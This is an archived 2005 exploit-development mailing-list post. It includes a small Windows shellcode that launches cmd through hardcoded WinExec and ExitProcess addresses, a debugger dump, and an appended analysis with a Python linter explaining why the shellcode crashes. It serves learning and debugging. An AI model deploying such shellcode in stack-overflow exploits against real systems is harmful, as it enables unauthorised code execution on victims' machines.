Vulnerability Development mailing list archives

problem to exploit a stack overflow


From: migalo digalo <l.epsilon () gmail com>
Date: Tue, 24 May 2005 14:09:56 +0000

hi all,

ok, I ran many tests with shellcode that has no 0xcc and 0xc9 bytes ... I
decided to test it with my own shellcode (a very simple one):
unsigned char shellcode[] =
"\xC6\x45\xFC\x63"                      /* mov       byte ptr [ebp-4],63h*/
"\xC6\x45\xFD\x6D"                      /* mov        byte ptr [ebp-3],6Dh*/
"\xC6\x45\xFE\x64"                      /*mov         byte ptr [ebp-2],64h*/
"\x33\xC0"                                      /*xor eax,eax*/
"\x50"                                          /*push eax*/
"\x6A\x01 "                                     /*push        1*/     
"\x8D\x45\xFC "                         /*lea         eax,[ebp-4]*/
"\x50"                                          /*push        eax*/
"\xB8\x4D\x11\x86\x7C"          /*mov eax,0x7c86114d (winexec)*/
"\xFF\xD0"                                      /*call eax*/
"\x6A\x01"                                      /*push 1*/
"\xB8\xA2\xCA\x81\x7C"          /*mov eax,0x7c81caa2(ExitProcess)*/
"\xFF\xD0";                                     /*call eax*/

and a debug session gives me this:

0012FF34 C6 45 FC 63          mov         byte ptr [ebp-4],63h
0012FF38 C6 45 FD 6D          mov         byte ptr [ebp-3],6Dh
0012FF3C C6 45 FE 64          mov         byte ptr [ebp-2],64h
0012FF40 33 C0                xor         eax,eax
0012FF42 50                   push        eax
0012FF43 6A 01                push        1
0012FF45 20 8D 45 FC 20 50    and         byte ptr [ebp+5020FC45h],cl
0012FF4B B8 4D 11 86 7C       mov         eax,7C86114Dh
0012FF50 FF D0                call        eax
0012FF52 6A 01                push        1
0012FF54 B8 A2 CA 81 7C       mov         eax,7C81CAA2h
0012FF59 FF D0                call        eax
0012FF5B 90                   nop


EAX = 00000001 EBX = 7FFD9000 ECX = 00423AA8
 EDX = 00000000 ESI = 00000000 EDI = 0012FF80
 EIP = 0012FF34 ESP = 0012FF34 EBP = 90909090
 EFL = 00000246 CS = 001B DS = 0023 ES = 0023
 SS = 0023 FS = 003B GS = 0000 OV=0 UP=0 EI=1 PL=0
 ZR=1 AC=0 PE=1 CY=0

 9090908C = ??

 ST0 = +0.00000000000000000e+0000
 ST1 = +0.00000000000000000e+0000
 ST2 = +0.00000000000000000e+0000
 ST3 = +0.00000000000000000e+0000
 ST4 = +0.00000000000000000e+0000
 ST5 = +0.00000000000000000e+0000
 ST6 = +0.00000000000000000e+0000
 ST7 = +0.00000000000000000e+0000 CTRL = 027F
 STAT = 0000 TAGS = FFFF EIP = 00000000 CS = 0000
 DS = 0000 EDO = 00000000

so the access violation happened (this time) at the beginning of the
shellcode !!!? Is that a security feature in XP SP2? Or something
else? Can someone help me understand this.
thank you
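The disassembly in the post shows two things a reader can check arithmetically. First, the `and byte ptr [ebp+5020FC45h],cl` at 0012FF45 is not an instruction the author wrote: the two fragments `"\x6A\x01 "` and `"\x8D\x45\xFC "` carry a space inside the quotes, and the C compiler emits that space as a 0x20 byte in the code stream, so the decoder swallows the following `8D 45 FC` as a displacement. Second, the register dump has EBP = 90909090, so the very first instruction, `mov byte ptr [ebp-4],63h`, writes to 9090908C, the unmapped address the memory window shows as `9090908C = ??`. The script below is an added example (not code from the post) that re-parses the posted literal the way a C compiler concatenates it, flags every byte that came from a typed character rather than a `\x` escape, and computes those two addresses; the copy of the literal embedded in it is constructed from the post and reproduces the stray spaces exactly.

```python
"""Lint a C-style byte-string literal for bytes that did not come from \\x escapes.

Added example, not code from the original post. It re-parses the literal the
way the C compiler does: adjacent "..." fragments are concatenated, \\xHH yields
one byte, and any other character typed inside the quotes (a stray space, for
instance) yields its ASCII byte, which then lands in the code stream.
"""
import re

# Constructed copy of the literal from the post; the two fragments with a
# trailing space inside the quotes are reproduced exactly as posted.
SHELLCODE_LITERAL = r'''
"\xC6\x45\xFC\x63"      /* mov byte ptr [ebp-4],63h */
"\xC6\x45\xFD\x6D"      /* mov byte ptr [ebp-3],6Dh */
"\xC6\x45\xFE\x64"      /* mov byte ptr [ebp-2],64h */
"\x33\xC0"              /* xor eax,eax */
"\x50"                  /* push eax */
"\x6A\x01 "             /* push 1   <- stray space inside the quotes */
"\x8D\x45\xFC "         /* lea eax,[ebp-4]   <- stray space inside the quotes */
"\x50"                  /* push eax */
"\xB8\x4D\x11\x86\x7C"  /* mov eax,0x7c86114d */
"\xFF\xD0"              /* call eax */
"\x6A\x01"              /* push 1 */
"\xB8\xA2\xCA\x81\x7C"  /* mov eax,0x7c81caa2 */
"\xFF\xD0";             /* call eax */
'''

# Single-character escapes a C compiler accepts inside a string literal.
SIMPLE_ESCAPES = {'n': 0x0A, 't': 0x09, 'r': 0x0D, '0': 0x00,
                  '\\': 0x5C, '"': 0x22, "'": 0x27}


def parse_c_byte_literal(source):
    """Return a list of (byte, origin) in the order the compiler emits them.

    origin is "escape" for \\xHH and \\n-style escapes, "literal" for any
    character that was typed directly inside the quotes.
    """
    source = re.sub(r'/\*.*?\*/', '', source, flags=re.S)  # drop /* */ comments
    out = []
    for frag in re.findall(r'"((?:[^"\\]|\\.)*)"', source):
        i = 0
        while i < len(frag):
            ch = frag[i]
            if ch != '\\':
                out.append((ord(ch), 'literal'))
                i += 1
                continue
            nxt = frag[i + 1]
            if nxt in 'xX':
                # C takes every following hex digit; the next backslash ends it.
                m = re.match(r'[0-9A-Fa-f]+', frag[i + 2:])
                if not m:
                    raise ValueError('\\x with no hex digits at index %d' % i)
                out.append((int(m.group(0), 16) & 0xFF, 'escape'))
                i += 2 + len(m.group(0))
            elif nxt in SIMPLE_ESCAPES:
                out.append((SIMPLE_ESCAPES[nxt], 'escape'))
                i += 2
            else:
                raise ValueError('unsupported escape \\%s at index %d' % (nxt, i))
    return out


def find_stray_bytes(parsed):
    """Offsets and values of bytes that came from typed characters, not escapes."""
    return [(off, b) for off, (b, origin) in enumerate(parsed) if origin == 'literal']


def effective_address(base, displacement):
    """32-bit wrap-around address arithmetic, as the CPU computes [base+disp]."""
    return (base + displacement) & 0xFFFFFFFF


def report(literal, load_address, ebp):
    """Human-readable findings; load_address and ebp are taken from the debugger dump."""
    parsed = parse_c_byte_literal(literal)
    lines = ['%d bytes decoded from the literal' % len(parsed)]
    for off, b in find_stray_bytes(parsed):
        lines.append('stray byte 0x%02X at offset %d (address %08X) came from a typed '
                     'character, not an escape' % (b, off, effective_address(load_address, off)))
    lines.append('first instruction mov byte ptr [ebp-4] writes to %08X'
                 % effective_address(ebp, -4))
    return lines


if __name__ == '__main__':
    # EIP/ESP = 0012FF34 and EBP = 90909090 are the values in the posted dump.
    for line in report(SHELLCODE_LITERAL, 0x0012FF34, 0x90909090):
        print(line)
```

Run against the posted literal, the report decodes 39 bytes (0012FF34 through 0012FF5B, the span the disassembly covers), flags 0x20 at offsets 17 and 21 (addresses 0012FF45 and 0012FF49, exactly the `20` bytes in the `20 8D 45 FC 20 50` line), and prints 9090908C as the target of the first write, which is the address the memory window could not read. The lint catches the first problem before the code ever runs; the second is visible only from the register state, since a saved frame pointer overwritten with 0x90 bytes makes every `[ebp-N]` reference point into unmapped memory.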

